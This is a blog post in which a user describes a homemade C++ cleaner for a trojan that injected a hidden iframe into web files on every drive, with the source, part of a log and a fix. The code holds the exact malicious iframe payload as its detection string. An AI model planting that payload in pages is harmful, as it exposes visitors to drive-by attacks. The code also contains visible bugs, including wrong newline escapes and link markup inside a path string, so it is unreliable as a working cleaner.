一个小小的杀毒程序

最新推荐文章于 2023-08-22 15:42:19 发布
最新推荐文章于 2023-08-22 15:42:19 发布
阅读量905 收藏
点赞数
分类专栏: Virus 文章标签: string internet path c file iostream

一个小小的杀毒程序
今天机子中毒了,郁闷,原来是一个木马,所有htm/html/asp/aspx/shtml都被感染!没办法杀毒也查不出来,无奈就自己杀吧!写了一个杀毒的程序!呵呵,还能用,不过也发现一写问题以前老师说文件的一行最大是1024个字符,以前我对此深信不疑,今天做这个才发现不见得都是,一写网页的代码中就能超过1024有的是很多,幸亏我还有怀疑精神啊,呵呵,就改了,
下面是杀毒的源代码:

//coded by winc_co


//
// coded by winc_fan 2007-4-27
//
//
#include <io.h>
#include <stdio.h>
#include <direct.h>
#include <ctype.h>
#include <iostream>
#include <fstream>
#include <string>
using namespace std;

// 感染的木马
std::string virus = "<iframe src=http://pp.900666.com/abc.htm width=0 height=0></iframe>";
//方法声明

void DirPath();
void inter();
void killer(std::string path);
bool chkFileEx(std::string filename);
void init();

void main()
{
 inter();
 init();
 
 cout << "............杀毒完成........." << endl;
}

//开始界面设计
void inter()
{
 cout << "======================================================" << endl;
 cout << "欢迎使用winc_co的杀毒软件!" << endl;
 cout << "杀毒开始..........." << endl;
}

///浏览目录
void DirPath(std::string path)
{
 if(chkFileEx(path))
 {
  cout << "找到目标文件" << endl;
  cout << path << endl;
  killer(path);
 }
 
 //定义文件的结构体
 int len=path.length();
 int idx=path.find_last_of('.');
 
 if(idx==len-1)
  return;
 
 struct _finddata_t c_file; //head file <io.h>
 long findFile;
 
 path=path+ "//";
 std::string filename=path;
 path+="*.*";
 
 findFile = _findfirst(path.c_str(), &c_file);
 
 while( _findnext( findFile, &c_file ) == 0 )
 {
  if(chkFileEx(c_file.name))
  {
   cout << "找到目标文件" << endl;
   cout << filename+c_file.name << endl;
   killer(filename+c_file.name);  
   
   continue;
  }
  
  DirPath(filename+c_file.name);
 }
 
 _findclose( findFile );
}

//程序的开始。。。。。
void init()
{
 //获得盘符的根目录
 std::string dsk;
 
 for(int drive = 1; drive <= 26; drive++ )
 {
  //head file <direct.h>
  if( !_chdrive( drive ) )
   dsk=drive + 'A' - 1;
  dsk+=":";
 
  DirPath(dsk);
 }
}

//处理感染文件
void killer(std::string path)
{
 fstream log;//日志文件
 fstream temp; //临时文件
 fstream target;//目标文件
 
 std::string tempfile= path.substr(0,path.find_last_of('//'))+"[url=file:temp.txt]//temp.txt[/url]";
 
 temp.open(tempfile.c_str(),std::ios::out);
 target.open(path.c_str());
 
 char buf[511025];
 
 std::string contp; // 临时文件的存放的内容
 while(!target.eof())
 {
  target.getline(buf,511024);
  std::string cockhorse; //木马
  cockhorse=buf;
               
  //处理病毒的关键步骤跳过木马
  if(cockhorse.find(virus)!=-1L)
  {
   int i=cockhorse.find(virus);

   if(i!=0)
   {
    contp+=cockhorse.substr(0,i-1);
   }
   
   continue;
  }
  
  contp+=buf;
  contp+='/n'; //添加换行
 }
       
 //保存内容
 temp.write(contp.c_str(),contp.length());
 temp.close();
 target.close();
 
 //删除目标文件,用临时文件代替
 remove(path.c_str());
 rename(tempfile.c_str(),path.c_str());
 
 //记录日志
 log.open("c://log.txt",std::ios::out|std::ios::in|std::ios::app);
 std::string logstr=path+'/n';
 path+='/n';
 
 log.write(path.c_str(),path.length());
 log.close();
}

//后缀名判断
bool chkFileEx(std::string filename)
{
 std::string exname;
 int ex=filename.find_last_of(".");
 
 if(ex==-1)
  return false;
 exname=filename.substr(ex);
 
 //后缀名的检验
 if(exname==".html"||exname==".aspx"||exname==".htm"||exname==".asp"||exname==".shtml")
  return true;
 
 return false;
}
 

//=========================================================

日志:

C:/Documents and Settings/_CSU/Application Data/Mozilla/Firefox/Profiles/l0zhbjov.default/bookmarkbackups/bookmarks-2004-10-15.html
C:/Documents and Settings/_CSU/Application Data/Mozilla/Firefox/Profiles/l0zhbjov.default/bookmarkbackups/bookmarks-2007-04-15.html
C:/Documents and Settings/_CSU/Application Data/Mozilla/Firefox/Profiles/l0zhbjov.default/bookmarks.html
C:/Documents and Settings/_CSU/Local Settings/Temporary Internet Files/Content.IE5/GDMG02V1/pv[1].aspx
C:/Documents and Settings/_CSU/Local Settings/Temporary Internet Files/Content.IE5/GDMG02V1/welcome[1].shtml
C:/Documents and Settings/_CSU/Local Settings/Temporary Internet Files/Content.IE5/MUGLZBF5/s[1].aspx
C:/Documents and Settings/_CSU/Local Settings/Temporary Internet Files/Content.IE5/MUGLZBF5/s[2].aspx
C:/Documents and Settings/_CSU/Local Settings/Temporary Internet Files/Content.IE5/YU4SUCI0/upload[1].html
C:/Documents and Settings/_CSU/Local Settings/Temporary Internet Files/Content.IE5/YU4SUCI0/Url_Count[2].aspx
C:/Inetpub/iissamples/sdk/asp/applications/Application_JScript.asp
C:/Inetpub/iissamples/sdk/asp/applications/Application_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/applications/Session_JScript.asp
C:/Inetpub/iissamples/sdk/asp/applications/Session_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/components/AdRotator_JScript.asp
C:/Inetpub/iissamples/sdk/asp/components/AdRotator_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/components/BrowserCap_JScript.asp
C:/Inetpub/iissamples/sdk/asp/components/BrowserCap_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/components/redirect.asp
C:/Inetpub/iissamples/sdk/asp/database/AddDelete_JScript.asp
C:/Inetpub/iissamples/sdk/asp/database/AddDelete_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/database/LimitRows_JScript.asp
C:/Inetpub/iissamples/sdk/asp/database/LimitRows_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/database/MultiScrolling_JScript.asp
C:/Inetpub/iissamples/sdk/asp/database/MultiScrolling_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/database/SimpleQuery_JScript.asp
C:/Inetpub/iissamples/sdk/asp/database/SimpleQuery_VBScript.asp
C:/Inetpub/iissamples/sdk/asp/database/StoredProcedures_JScript.asp
C:/Inetpub/iissamples/sdk/asp/database/StoredProcedures_VBScript.asp

.........

太多了,就列这些吧

 //后发现有的文件是大写的所以在后缀名判断的那里有点问题,换用CString 把它转换成小写的就好!

CString cexname=exname;
 cexname.MakeLower();
 if( cexname==".html"||
  cexname==".aspx"||
  cexname==".htm"||
  cexname==".asp"||
  cexname==".shtml"
  )


 

andylin02
关注
专栏目录
做个简单的杀毒程序(超简单)
08-21
简单的杀毒程序,只需几十秒就可以完成!将代码复制到文本中,以bat格式打开,就可以完成清理!
杀毒程序杀毒程序
12-15
杀毒程序杀毒程序杀毒程序杀毒程序
自制小型杀毒程序
weixin_30919571的博客
09-24 591
  前天帮同事清理完病毒后,想到做一个杀毒程序,说做就做。经过两天的努力,终于做完了,与大家分享一下。目前暂不提供原代码及程序下载,以便可以进一步与有兴趣的朋友共同探讨这方面问题。 一、检测病毒;二、检测到了病毒;三、杀毒后; 转载于:https://www.cnblogs.com/172838427/archive/2006/09/24/513399.html...
java杀毒程序加框_微信小程序实现modal弹出框遮罩层组件(可带文本框)
weixin_33835461的博客
03-01 414
modal弹出框遮罩层可实现提示信息、验证码等功能然而在官方文档已经删除了modal的页面,说要废弃modal就个人而言modal组件无法被wx.showModal完全替代。大家都知道小程序的wxml的组件可以通过改变js的值实现重新渲染,而接口是无法实现的有同感的也不止博主一个人官方18-5-13的建议要实现此类功能也是用modal属性说下遮罩层实现,通过改变modal的hidden属性来控制是...
一个小小的杀毒软件
05-05
一个很好用的杀毒软件。非常好用。功能齐全,更360差不多
E语言关闭win10自带杀毒Defender检查工具源码和成品.zip
08-22
`【新提醒】玖毅论坛网 - 专注分享网络活动资讯,提供软件源码下载 - 一切只为你而存在.url`是一个链接,可能是提供相关技术讨论、软件资源分享的论坛。在论坛中,你可以找到更多关于E语言和Windows Defender管理的...
畅游精灵 V2.2 build0113 _网页杀毒软件.rar
07-14
畅游精灵是超级巡警实验室推出的网页杀毒软件,产品在原畅游巡警的基础上进行二次开发,采用更为先进的脚本引擎,病毒引擎,云查杀引擎,最大限度防御网马,恶意脚本,钓鱼网站的攻击,为您的网络生活保驾护航。...
小小火柴人桌面打斗屏保.rar
05-08
《小小火柴人桌面打斗屏保》是一款充满趣味性的屏幕保护程序,它将你的桌面转变为一个生动活泼的战场,让无数个形象可爱的"火柴人"在此进行激烈的打斗表演,为工作之余的生活带来轻松与欢乐。 首先,我们要了解什么...
小小黑客之路 源码 code
03-04
所有代码均为书中各章节对应案例代码,全部在Windows XP SP3、Visual Studio 2008环境下可编译并运行通过,具体编译选项请针对各章节说明进行配置。...部分案例程序会被杀毒软件报告为黑客工具或者病毒并查杀,请注意。
简单杀毒软件源代码
06-07
这是一个简单木马扫描器、杀毒软件的源代码。
杀毒软件源码
07-12
查杀本地木马 垃圾文件 界面自己设置 下载后都可以自己修改
c语言diy杀毒程序源代码,c - 源码下载|其它|杀毒|源代码 - 源码中国
weixin_39759589的博客
05-17 607
杀毒\杀毒\alert.cs....\....\alert.Designer.cs....\....\alert.resx....\....\bin\Debug\db.mdb....\....\...\.....\IrisSkin2.dll....\....\...\.....\Skin\RealOne.ssk....\....\...\.....\Skin....\....\...\.....\...
普通人杀毒 vs 程序杀毒
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
09-26 1523
黑客技术点击右侧关注,了解黑客的世界!来源丨抖音(抖音号:918389773)推荐↓↓↓长按关注????【16个技术公众号】都在这里!涵盖:程序员大咖、源码共读、程序员共读...
C++病毒小程序
Ampty36的博客
05-03 1601
**一段简单的C/C++病毒源程序 ** 主要是感染C/C++源文件只要编译该段源程序就会使当前目录里的所有.c和.cpp文件感染上病毒,当然如果是没有主函数的源文件就没有作用:思想很简单:插入一段复制自身的代码,而这段代码是将自身的病毒部分传播给同目录下的其它文件。 程序清单: 1.病毒文件 //START #include <windows.h> #include <fstr...
ClamWin杀毒程序的改写
DongDong
04-02 1234
简介:ClamWin是一款开源的杀毒程序,这款程序可以从SourceForge上通过Subversion for windows下载。下面是对ClamWin杀毒软件改写。1 程序安装程序安装的时候需要注意的事项 在上图中可以看到两个勾选项,这两项在改写的程序中不需要。 上图一个勾选项中写的病毒库文件是需要下载的,但在改写程序中不需要连接网络下载病毒库文件,只需要先准备一些病毒库样本就可以了。
最基础的木马小程序 C语言
jishichen0512的专栏
11-14 925
最基础的木马小程序 C语言/* SVCHOST.C   *//* SVCHOST.EXE *//* SVCHOST.COM */#include /*标准输入输出*/#include /*字符串操作*/#include /*其它函数*/#include /*进程控制*/#include /*目录函数*/#define SVCHOST_NUM 6 /*关键位置病毒
c语言diy杀毒程序源代码,C语言作品→杀毒程序(原始版)
weixin_39968946的博客
05-17 1953
郁闷~~~发现了一个很让我郁闷的问题C语言中的输入函数连续使用 就会失效,不能中断程序等待输入 很郁闷 ···例如:scanf();下面是一个代码片段:#incude #include int mian(){char a,b,c;printf("请输入第一个字母:");scanf("%c",&a);printf("请输入第二个字母:");scanf("%c",&b);print...
杀毒程序(python)
最新发布
hackerVDM的博客
08-22 334
杀毒程序代码仅供参考。(紧急情况请用正规杀毒软件)
快速制作简易杀毒批处理程序
"这篇文章介绍了一个简单的杀毒程序,它是一个批处理文件,可以在短时间内清理系统中的临时文件和一些常见无用文件,同时还能修改注册表项以阻止恶意程序自启动。" 这个简单的杀毒程序主要由以下几个部分组成: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值